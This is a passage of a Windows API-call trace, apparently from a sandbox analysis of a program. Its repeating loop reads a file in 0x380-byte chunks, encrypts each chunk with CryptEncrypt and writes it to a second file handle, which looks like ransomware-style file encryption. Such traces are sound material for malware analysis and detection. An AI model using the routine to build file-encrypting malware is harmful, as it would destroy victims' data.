pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.479] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.480] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.480] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.480] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.480] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.480] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.480] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.480] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.480] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.480] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.480] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.480] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.481] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.481] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.481] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.481] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.481] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.481] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.481] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.481] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.481] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.481] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.481] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.482] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.482] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.482] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.482] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.482] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.482] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.482] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.482] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.482] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.482] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.482] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.483] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.483] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.483] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.483] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.483] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.483] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.483] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.483] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.483] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.483] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.483] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.483] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.484] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.484] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.484] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.484] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.484] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.484] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.484] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.484] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.484] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.484] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.484] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.484] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.485] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.485] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.485] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.485] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.485] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.485] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.485] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.485] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.485] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.485] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.486] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.486] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.486] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.486] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.486] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.486] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.486] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.486] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.486] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.486] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.486] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.487] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.487] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.487] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.488] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.488] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.488] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.488] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.488] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.488] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.488] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.488] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.488] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.488] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.489] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.489] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.489] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.489] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.489] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.489] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.489] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.489] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.489] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0272.489] CryptEncrypt (in: hKey=0x2fa988, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0272.489] WriteFile (in: hFile=0x5d48, 